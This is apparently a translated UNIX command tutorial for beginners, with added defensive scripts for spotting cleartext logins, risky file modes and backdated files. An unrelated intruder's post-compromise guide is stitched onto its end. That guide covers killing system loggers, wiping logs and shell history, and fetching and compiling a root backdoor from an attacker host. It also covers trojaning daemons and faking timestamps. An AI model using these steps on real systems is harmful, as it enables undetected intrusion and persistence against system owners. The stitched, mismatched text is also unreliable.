By: Yudi Bascoro
UNIX COMMANDS
Before going on, remember that in Linux/UNIX commands are (almost always) written in lower case, and that Linux/UNIX is case-sensitive: ls, LS and Ls are three different names.
——> ls
Remember the DIR command in DOS? This is the equivalent: it lists the files in a directory. ls also takes extra flags, which you can see by typing:
ls --help ; shows the built-in help
man ls ; man means manual, so this is the manual for ls
Some common uses of ls are:
ls -l ; show extra information (l = long)
ls -a ; show hidden files, i.e. names beginning with a dot (a = all)
ls -la ; both at once
The extra information shown by -l includes the user who owns the file, the date and time it was last modified, its permissions, and more, for example:
rwxr-x--x
Note:
characters 1-3: user/owner permissions
characters 4-6: group permissions
characters 7-9: other permissions
The letters mean:
r - read permission
w - write permission
x - (e)xecute permission
So in the example above the user/owner can read, write and execute the file; users in the same group as the owner can read and execute it; everyone else can only execute it. A - in a position means that permission is absent. If there is a d in front of the permission string, the entry is a directory.
——> cat
cat (concatenate) is used to display and to write/create files, roughly like TYPE in DOS. To display a file, type: cat filename. To create a file, type: cat > filename, type the contents, and press CTRL+D (end of input) to finish and save. CTRL+C also ends it, but by killing cat rather than closing the input cleanly, so prefer CTRL+D. If filename already exists it is overwritten; to append to an existing file instead, replace > with >>.
——> more
Displays a file one screen at a time; press q to quit.
more jilid1.txt
——> grep
Prints every line that contains the given pattern.
grep kecoak jilid1.txt
prints every line of jilid1.txt that contains kecoak.
——> man
The UNIX help/manual; type man command to read the manual page for command, for example:
man pwd
——> echo
echo prints what you give it to the screen, for example:
echo "saya belajar linux"
saya belajar linux
or, with redirection, creates a file:
echo "biff n" > .profile
which creates the file .profile in the current directory containing the text biff n. Be careful: > replaces any existing .profile; to add to a file instead of overwriting it, replace > with >>.
——> cp
copy, used to copy files.
cp jilid1.txt jilid1.txt.backup
cp jilid1.txt ~cyberbug/backup/jilid1.txt.backup
(~cyberbug is the home directory of user cyberbug)
——> mv
move, renames a file or directory (or moves it to another directory)
mv jilid1.txt jilid1a.txt
mv backup bak
——> rm
remove, deletes files
rm jilid1.txt ; delete jilid1.txt
rm * ; delete every file in the current directory (careful, there is no undo!)
——> cd
change directory, used to move to another directory, same as CD in DOS
cd /root
note that Linux uses / (slash) in paths, not \ (backslash)
——> mkdir
make directory, creates a directory
mkdir backup
——> rmdir
remove directory, deletes a directory; the directory must be empty, so delete the files inside it first.
rmdir backup
——> who
who shows the users logged in to the system; the output looks roughly like this:
cyberservices:~$ who
root tty1 Dec 20 17:47
cyberbug tty2 Dec 20 17:48
cyberbug tty3 Dec 20 17:48
cyberbug ttyp0 Dec 20 18:43 (localhost)
The first column is the login name, the second the terminal line in use, the third the login time, and the fourth the domain or IP address they connected from; if it is empty they are sitting at the console directly.
——> whoami
For when you have forgotten who you are: Who am I?
cyberservices:~$ whoami
cyberbug
——> who am i
This one too, for when you have completely lost your bearings :)
cyberservices:~$ who am i
cyberservices!cyberbug tty3 Dec 20 17:48
——> pwd
Shows the current directory; pwd = print working directory, the command for when you have wandered around and no longer know the way home.
cyberservices:~$ pwd
/home/cyberbug
——> ps
Shows the running processes. Without options ps lists only your own processes on this terminal; ps aux lists every process on the system.
cyberservices:~$ ps
PID TTY STAT TIME COMMAND
87 2 S 0:00 -bash
88 3 S 0:00 -bash
1440 2 S 0:00 pico jilid2.txt
1443 3 R 0:00 ps
——> ping
Checks whether a host is 'up'; for the technical details, see man ping.
cyberservices:~$ ping localhost
PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms
--- localhost ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.2 ms
cyberservices:~$ ping 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms
--- 127.0.0.1 ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.2 ms
cyberservices:~$
Note that localhost and 127.0.0.1 are the same thing:
127.0.0.1 is the local loopback address, provided for testing; traffic sent to it never leaves the machine.
——> finger
Looks up information about users. Note how much it gives away to anyone who can reach the finger port: login names, full names, home directories, shells, idle times and mail-forwarding settings, which is why most sites no longer run a finger daemon.
cyberservices:~$ finger
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:37 Dec 22 01:10
cyberservices:~$ finger @cyberservices.com
[cyberservices.com]
Welcome to Linux version 2.0.34 at cyberservices.com !
3:46am up 2:37, 3 users, load average: 0.00, 0.00, 0.00
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:39 Dec 22 01:10
cyberservices:~$ finger @localhost
[localhost]
Welcome to Linux version 2.0.34 at cyberservices.com !
3:47am up 2:38, 3 users, load average: 0.00, 0.00, 0.00
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:40 Dec 22 01:10
cyberservices:~$ finger cyberbug
Login: cyberbug Name: CyberBug
Directory: /home/cyberbug Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty2 8 seconds idle
On since Tue Dec 22 01:10 (PHT) on tty3
Last login Tue Dec 22 01:13 (PHT) on tty4
Mail forwarded to "|IFS=' '&&exec /usr/bin/procmail -f-||exit 75 #cyberbug"
No mail.
No Plan.
cyberservices:~$ finger root
Login: root Name:
Directory: /root Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty1 1 hour 42 minutes idle
Mail last read Tue Dec 15 09:19 1998 (PHT)
No Plan.
——> telnet
Communicates with another host using the telnet protocol. Note that telnet has no encryption: the login name, the password and the whole session cross the network in the clear (ssh is the encrypted replacement). The password in the session below is shown only for illustration; a real login prompt does not echo it.
cyberservices:~$ telnet localhost
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
Welcome to Linux 2.0.34.
cyberservices login: cyberbug
Password: 3m4nggu3p1k1r1n
Linux 2.0.34.
Last login: Tue Dec 22 01:13:52 on tty4.
No mail.
cyberservices:~$ telnet localhost 25
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
220 cyberservices.com ESMTP Sendmail 8.9.0/8.9.0; Tue, 22 Dec 1998 03:52:51 +0800
helo darling
250 cyberservices.com Hello cyberbug@localhost [127.0.0.1], pleased to meet you
mail from: guest@cyberservices.com
250 guest@cyberservices.com… Sender ok
rcpt to: untukmu@seorang.jauh.disana
250 untukmu@seorang.jauh.disana… Recipient ok (will queue)
data
354 Enter mail, end with “.” on a line by itself
Kukirim lagu dan salam rinduku
.
250 EAA01615 Message accepted for delivery
quit
cyberservices:~$ telnet localhost 110
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
+OK cyberservices POP3 Server (Version 1.005l) ready at
user root
+OK please send PASS command
pass 3m4nggu3p1k1r1n
+OK 2 messages ready for root in /usr/spool/mail/root
stat
+OK 2 7227
retr 1
quit
——> ftp
Runs the file transfer program.
cyberservices:~$ ftp localhost
Connected to localhost.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May 20 13:45:04 CDT 1998) ready.
Name (localhost:cyberbug): ftp
331 Guest login ok, send your complete e-mail address as password.
Password: cyberbug@k-elektronik.org
230-Welcome, archive user! … blah blah … blah
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp can also be driven by hand by telnetting to port 21:
cyberservices:~$ telnet localhost 21
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May 20 13:45:04 CDT 1998) ready.
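The three sessions above (the SMTP dialogue on port 25, the POP3 login on port 110 and the FTP login on port 21) all travel in the clear, so anyone on the path can read them. The script below is an added example, not code from the original article: it takes transcripts of such sessions (constructed here from the article's own exchanges, with the article's illustrative password and addresses) and pulls out the cleartext USER/PASS pairs, then checks whether the SMTP server accepted a RCPT TO for a domain other than its own, the classic open-relay probe. The function names, the local domain cyberservices.com and the assumption that the transcript holds one command or reply per line are mine.

```shell
#!/bin/sh
# Added example (not from the original article). Reads captured client/server
# dialogue, one command or reply per line, and reports:
#   1. credentials sent in the clear (POP3 and FTP USER/PASS pairs)
#   2. RCPT TO addresses outside the server's own domain that got a 250 reply
# The transcripts below are constructed from the article's sessions.

# extract_creds: print "PROTO user password" for each USER/PASS pair on stdin.
# FTP and POP3 use the same verbs, so the protocol is taken from the banner
# (220 ... FTP = FTP, +OK ... POP3 = POP3). Verbs are matched case-insensitively.
extract_creds() {
    proto=unknown; user=""
    while IFS= read -r line; do
        case $line in
            220*FTP*)  proto=FTP ;;
            +OK*POP3*) proto=POP3 ;;
        esac
        verb=$(printf '%s' "$line" | cut -d' ' -f1 | tr '[:lower:]' '[:upper:]')
        arg=$(printf '%s' "$line" | cut -d' ' -f2-)
        case $verb in
            USER) user=$arg ;;
            PASS) printf '%s %s %s\n' "$proto" "$user" "$arg" ;;
        esac
    done
}

# smtp_relay_check LOCALDOMAIN: read an SMTP transcript on stdin and print
# "RELAY-ACCEPTED addr" for every RCPT TO outside LOCALDOMAIN that the server
# answered with 250. Each reply is matched to the RCPT TO just before it.
smtp_relay_check() {
    local_domain=$1
    pending=""
    while IFS= read -r line; do
        lower=$(printf '%s' "$line" | tr '[:upper:]' '[:lower:]')
        case $lower in
            "rcpt to:"*)
                # keep the address: text after the colon, minus spaces and <>
                pending=$(printf '%s' "$lower" | cut -d: -f2- | tr -d ' <>')
                ;;
            250*)
                if [ -n "$pending" ]; then
                    case $pending in
                        *@"$local_domain") : ;;   # local delivery, expected
                        *) printf 'RELAY-ACCEPTED %s\n' "$pending" ;;
                    esac
                    pending=""
                fi
                ;;
            [45]??*)
                pending=""   # rejected by the server, nothing to report
                ;;
        esac
    done
}

# Constructed transcripts (modelled on the article's sessions; the FTP one is
# written as it appears on the wire, where the ftp client sends USER/PASS).
SMTP_SESSION='220 cyberservices.com ESMTP Sendmail 8.9.0/8.9.0; Tue, 22 Dec 1998 03:52:51 +0800
helo darling
250 cyberservices.com Hello cyberbug@localhost [127.0.0.1], pleased to meet you
mail from: guest@cyberservices.com
250 guest@cyberservices.com... Sender ok
rcpt to: untukmu@seorang.jauh.disana
250 untukmu@seorang.jauh.disana... Recipient ok (will queue)
data
354 Enter mail, end with "." on a line by itself
Kukirim lagu dan salam rinduku
.
250 EAA01615 Message accepted for delivery
quit'

POP3_SESSION='+OK cyberservices POP3 Server (Version 1.005l) ready
user root
+OK please send PASS command
pass 3m4nggu3p1k1r1n
+OK 2 messages ready for root in /usr/spool/mail/root
stat
+OK 2 7227
quit'

FTP_SESSION='220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1)) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS cyberbug@k-elektronik.org
230 Guest login ok, access restrictions apply.'

echo "--- credentials sent in the clear ---"
printf '%s\n' "$POP3_SESSION" "$FTP_SESSION" | extract_creds
echo "--- relay check (server domain cyberservices.com) ---"
printf '%s\n' "$SMTP_SESSION" | smtp_relay_check cyberservices.com
```

Feed it a terminal log or tcpdump -A output reassembled into lines. A relay hit from 127.0.0.1, as here, is expected, since MTAs relay for the local host; the same RCPT TO sent from an outside address is the real test, and "(will queue)" is what acceptance looks like. Telnet logins are not covered because the wire carries them keystroke by keystroke rather than as a PASS line.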
——> talk
Talk with another user; for example, cyberbug requests a talk session with root as follows:
talk root
atau
talk root@cyberservices.com
[Waiting for your party to respond]
[Ringing your party again]
On root's terminal this message appears:
Message from Talk_Daemon@cyberservices at 4:00 …
talk: connection requested by cyberbug@localhost.
talk: respond with: talk cyberbug@localhost
root must type talk cyberbug@localhost to answer the request:
talk cyberbug@localhost
[Connection established]
:: Additional commands from me (r3v0lt aka Intruded)
1. Compiling a file
ex. #gcc -o outputname sourcefile
#gcc -o pscan pscan.c
2. Running an executable
ex. #./file
#./pscan
#./scaner.pl
#./scanner.sh
3. Stopping a process
ex.# Ctrl+c
4. Suspending a process
ex.#ctrl+z ; to bring it back to the foreground type fg (job control works like this in bash, ksh and tcsh on Linux as well as on FreeBSD)
5. Changing your shell (on FreeBSD)
ex.#chsh —> ksh,bash,tcsh
6. Changing your password
ex.#passwd
7. Looking up the IP address of a host
ex.#dig hostname
ex.#nslookup hostname
(both take a host name and return its address; dig -x address does the reverse lookup)
8. Editor
ex.#pico wepedodol.c
9. Pipes, two processes at once
ex.# ls -al | head
shows only the top of the directory listing; head reads the output of ls from the pipe (if you give head a file name instead, it reads that file and ignores the pipe)
10. Changing the mode (permissions)
ex.#chmod +x file
r - read permission
w - write permission
x - (e)xecute permission
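The permission string explained under ls above and the chmod item here are two sides of the same thing: reading a mode and setting one. The script below is an added example, not code from the original article: it converts the nine-character mode string from ls -l into the octal form chmod accepts, and scans a listing for the modes a reviewer looks at first (setuid, setgid, world-writable). The sample listing is constructed and the function names are mine.

```shell
#!/bin/sh
# Added example (not from the original article): read ls -l mode strings,
# convert them to octal for chmod, and flag risky modes in a listing.

# tri_digit rwx -> 7, r-x -> 5, --x -> 1 (s and t in the third slot count as x)
tri_digit() {
    n=0
    case $1 in r??) n=$((n + 4)) ;; esac
    case $1 in ?w?) n=$((n + 2)) ;; esac
    case $1 in ??[xst]) n=$((n + 1)) ;; esac
    echo "$n"
}

# perm_to_octal rwxr-x--x -> 0751, rwsr-xr-x -> 4755, rwxrwxrwt -> 1777
# The leading digit carries the special bits: 4 setuid, 2 setgid, 1 sticky.
perm_to_octal() {
    m=$1
    u=$(printf '%s' "$m" | cut -c1-3)
    g=$(printf '%s' "$m" | cut -c4-6)
    o=$(printf '%s' "$m" | cut -c7-9)
    sp=0
    case $u in ??[sS]) sp=$((sp + 4)) ;; esac
    case $g in ??[sS]) sp=$((sp + 2)) ;; esac
    case $o in ??[tT]) sp=$((sp + 1)) ;; esac
    echo "$sp$(tri_digit "$u")$(tri_digit "$g")$(tri_digit "$o")"
}

# perm_warn MODE NAME: one line per finding worth a second look
perm_warn() {
    m=$1; name=$2; oct=$(perm_to_octal "$m")
    case $m in ??[sS]??????) printf 'SETUID %s (%s = %s)\n' "$name" "$m" "$oct" ;; esac
    case $m in ?????[sS]???) printf 'SETGID %s (%s = %s)\n' "$name" "$m" "$oct" ;; esac
    case $m in ???????w?)    printf 'WORLD-WRITABLE %s (%s = %s)\n' "$name" "$m" "$oct" ;; esac
}

# scan_ls: read ls -l lines on stdin, strip the type character (-, d, l ...)
# and run perm_warn on each entry. Usage on a live system: ls -la /usr/bin | scan_ls
# (for a whole filesystem, find / -perm -4000 is the right tool).
scan_ls() {
    while read -r mode links owner group size mon day time name; do
        perm=$(printf '%s' "$mode" | cut -c2-10)
        [ ${#perm} -eq 9 ] && perm_warn "$perm" "$name"
    done
}

# Constructed listing (not real output from the article's host)
SAMPLE='-rwxr-x--x 1 cyberbug users   1024 Dec 20 17:47 jilid1.txt
-rwsr-xr-x 1 root     root   31000 Dec 20 17:47 passwd
-rw-rw-rw- 1 root     root     512 Dec 20 17:47 .profile
drwxr-xr-x 2 cyberbug users   1024 Dec 20 17:47 backup'

echo "rwxr-x--x in octal: $(perm_to_octal rwxr-x--x)"
printf '%s\n' "$SAMPLE" | scan_ls
```

The octal form is what chmod takes (chmod 751 file gives rwxr-x--x); a setuid root binary with a world-writable bit, or any world-writable file in a home or system directory, is the kind of entry the scan is meant to surface.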
1. killall -9 syslogd klogd - pesky loggers! Only a few admins will notice if they get turned off. Now you can act freely. Copy secure.1 and messages.1 from /var/log over secure and messages; normally these logs are the only ones with the intruder's IP and traces of a root compromise in them. If *.1 doesn't exist, truncate the files. Also, unset HISTFILE is important. Nobody does unset HISTFILE, thus leaving a .bash_history in /var/named or even in /. Very unprofessional.
2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf... Inform yourself about how often the system is maintained and administered, and whether the logfiles are analysed.
* Look at how many people have access to it (/etc/passwd): the more the better for you (it keeps attention away from you).
* Look whether the system is already backdoored! You might want to remove other people's backdoors.
* Look for a loghost or SNMP (dangerous, because you can't manipulate the logs on a far-away loghost). Watch out for *logd, sniffers, network monitors etc. before you do anything big on the host. If you are paranoid, traceroute the host and see whether non-routers sit in front of it (probably an IDS, loghost, sniffer, etc.).
3. This is important: DON'T MANIPULATE THE SYSTEM CONFIGURATION! It is too easy to detect you if you add yourself to /etc/passwd or open a port by editing inetd.conf. Root kits and /bin/login trojans are the first things any sane admin will watch for. Install a stealthy port backdoor instead. My approach to uploading files is:
(on your box)
$ uuencode -m backdoor.c backdoor.c | less
(on the target box)
uudecode
# cc -o backdoor backdoor.c
A different method is to put a daemon on your own box, on port 666, that spits out the source code when someone connects to it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c. As I said, make sure you can get back in. If the box you rooted has an uptime of more than 300 days or so, you might consider not installing the backdoor for startup; instead, kill the vulnerable daemon, and when the host restarts, come back using the exploit. Normally you can replace a daemon that nobody uses with your backdoor. Look at inetd.conf to see which daemons are active. A safe bet is in.talkd, which is often enabled but seldom used. So, when you want to re-activate your backdoor, talk root@0wned.host.com for a second and your backdoor is running. You can also add /path/to/backdoor to /root/.profile, but that is a bit riskier than the inetd method.
4. Subscribe to bugtraq or the CIAC security list, or look at rootshell, to see what you need to do to patch the buggy software. If RPM is installed you can try rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm. If not, use ncftp to fetch the file anonymously, because it needs no user interaction. If you want, add an additional backdoor to your "patched" server; QPOP 2.53 even supports this itself. For every file you replace you should modify the timestamps. This won't help if the admin uses tripwire or cksum, but it is aimed at the admin who, like most admins, just does find / -ctime to scan for trojans and thinks he knows his job. To modify timestamps, you do a simple:
touch -r /bin/bash /path/to/your/trojan
this copies the access and modification times of /bin/bash onto your freshly added trojan. Voila! Note, though, that it does less than the previous paragraph hopes: touch can only set atime and mtime; the inode change time (ctime) is written by the kernel to the current time whenever the inode changes, including by the touch itself, so find / -ctime -1 still lists the file. Only checks that rely on mtime (ls -l, find -mtime) are fooled. The alternative for lazy people is to add an ipfwadm rule that blocks traffic from the outside (-W eth0) to the ports of the buggy daemons, and to put that command in an rc.d script as well. BIND doesn't need TCP port 53 for anything except zone transfers, replies too large for UDP and the RoTShB/ADM bind exploits; it works fine with 53/tcp firewalled. But be aware that this might get you detected, say if you disable port 110 or 143 on an ISP's central mail exchange server...
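The touch -r trick is easy to test rather than take on trust. The script below is an added example, not part of the original text: it builds a throw-away directory with a file backdated exactly as described, then uses find's -mtime and -ctime tests (the check the text expects admins to run) to show that the file still stands out, because touch cannot set the inode change time. The directory layout, the file names and the 1998 date are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original text): touch -r copies atime and mtime,
# but ctime is set by the kernel to the current time on every inode write,
# including the touch itself. A backdated file therefore shows an old mtime
# next to a fresh ctime, which find can test for.

# make_demo_dir: build the scenario in a temporary directory and print its path.
# File names and the 1998 timestamp are constructed for this demo.
make_demo_dir() {
    d=$(mktemp -d)
    # an "old" reference file; touch -t backdates its atime/mtime only
    touch -t 199812201747 "$d/ref"
    # the freshly dropped binary, backdated the way the text suggests
    echo 'trojan' > "$d/login"
    touch -r "$d/ref" "$d/login"
    # an honest new file: mtime and ctime both current
    echo 'notes' > "$d/fresh"
    printf '%s\n' "$d"
}

# find_backdated DIR: regular files whose mtime claims more than 30 days of age
# while the inode changed within the last day. Both ref and login match here
# (ref was backdated too); fresh does not.
find_backdated() {
    find "$1" -type f -mtime +30 -ctime -1
}

DEMO=$(make_demo_dir)
echo "backdated files under $DEMO:"
find_backdated "$DEMO"
echo "login as seen by ls -l (mtime) and ls -lc (ctime):"
ls -l "$DEMO/login"
ls -lc "$DEMO/login"
rm -rf "$DEMO"
```

On a live system run find_backdated / (or simply find / -type f -mtime +30 -ctime -1) and review the hits: cp -p and tar -p also leave old mtimes beside fresh ctimes, so a hit is a lead rather than proof. Checksums kept off the host, tripwire-style, remain the reliable check, as the text itself concedes.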
About your backdoor:
A port above 10000 is strongly recommended; a backdoor using UDP, ICMP or even something as unusual as raw IP is also very useful. People who bind /bin/sh to a port are idiots, because they open the host to everyone, letting in sniffers and probably other people who may seriously damage it. Make sure to password-protect everything that runs as root, with a password of at least 8 characters, because you have no way of detecting a brute-force attack. For the C programmers: listen(sockfd,1); maybe 2 connections, but not more.
For convenience, you can add things you want to happen on each successful backdoor login, like system("w"), system("killall -9 syslogd klogd"), or whatever. If you want a front-end backdoor with some integrated functions, try gateway[5].
Source: Dasar-dasar perintah UNIX/LINUX (Yudi Bascoro)